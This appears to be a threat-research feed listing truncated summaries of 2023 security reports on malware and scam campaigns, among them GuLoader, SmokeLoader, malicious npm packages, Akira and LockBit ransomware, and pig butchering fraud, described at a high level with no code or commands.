Checkpoint researchers expose a dual-use ecosystem where GuLoader and Remcos are marketed as legitimate tools, with GuLoader acting as a crypter to help Remcos evade antivirus and deliver payloads. The investigation ties BreakingSecurity and VgoStore to ThePro…
Category: Threat Research
Sonatype researchers are tracking an ongoing npm registry campaign where malicious packages are used to retrieve and exfiltrate Kubernetes configuration and SSH keys to an external server. At least 14 such packages have been identified, impersonating legitimat…
SmokeLoader has expanded beyond downloading and dropping other malware by offering plugins that harvest data from infected machines, including browser data, emails, cookies, and passwords. The Bitsight analysis dissects eight plugins (four 32-bit and four 64-b…
In the last weeks, we observed an increase in .NET based malware using DLL sideloading. A prominent example is JanelaRAT, a recent campaign targeting Latin American FinTech users.Their initial attack involves a phishing email, mainly in Portuguese language. The user is tricked into running a VisualBasic script, which then downloads the…
Threat actors using RedLine and Vidar initially deployed EV code-signed info stealers and later reused the same spear-phishing delivery chain to deliver ransomware (Ransom.Win64.CYCLOPS.A / “Knight” family). The campaign used double-extension attachments, remo…
Unit 42 researchers analyzed a fake PoC for CVE-2023-40477 in WinRAR that ultimately delivered VenomRAT via a multi-stage infection chain based on a PoC for CVE-2023-25157. The actors used social engineering and publicly available PoC code to lure miscreants i…
Cado Security Labs observed a 600x spike in P2Pinfect activity, with rapid variant updates and expanding geographic reach across major cloud providers. The analysis covers how the botnet infects Redis on Linux hosts, persists via cron and SSH mechanisms, and s…
NoEscape Ransomware emerged in 2023 as a RaaS, closely tying to Avaddon through similar encryption and deployment tactics, while expanding to Windows and Linux payloads and leveraging a TOR-based platform for victim disclosure. It combines multi-extortion with…
Gh0st RAT variants, including HiddenGh0st, are actively used to attack MS-SQL servers and deploy a public rootkit to hide infections and protect malicious activity. The operation collects extensive system data, exfiltrates credentials via Mimikatz, and enables…
BlackBerry researchers identify a financially motivated campaign, dubbed “Silent Skimmer,” targeting online payment infrastructure across APAC and NALA with web-server compromises to steal payment data. The operation leverages vulnerabilities in web applicatio…
Proofpoint notes a rise in Chinese-themed malware campaigns targeting Chinese-language speakers, including Sainbox (Gh0stRAT variant) and the newly identified ValleyRAT, alongside legacy Purple Fox. The campaigns use Chinese-language lures and diverse delivery…
CRIL researchers document widespread use of the open-source PySilon RAT by multiple threat actors, with VirusTotal reporting over 300 samples since June 2023. PySilon evolved from v1.0 (Dec 2022) to v3.6 (Aug 2023) and now offers extensive capabilities such as…
CyberCX DFIR describes Akira ransomware leveraging Hyper-V to deploy on new, unmonitored VMs to bypass EDR, causing widespread damage to attached VMs. The piece also covers attacker methods from initial access to post-exploitation, defense evasion with BYOVD t…
Sophos X-Ops documents a surge in pig butchering scams that push victims into fake liquidity mining schemes, exploiting DeFi concepts and social engineering rather than malware. A detailed victim case shows romance-based outreach via MeetMe, persistent multi-c…
eSentire intercepted three LockBit affiliate ransomware attacks aimed at an MSP and two manufacturers, halting them before widespread impact. The report highlights how attackers used RMM tools and remote-access software—and even brought their own tools—to prop…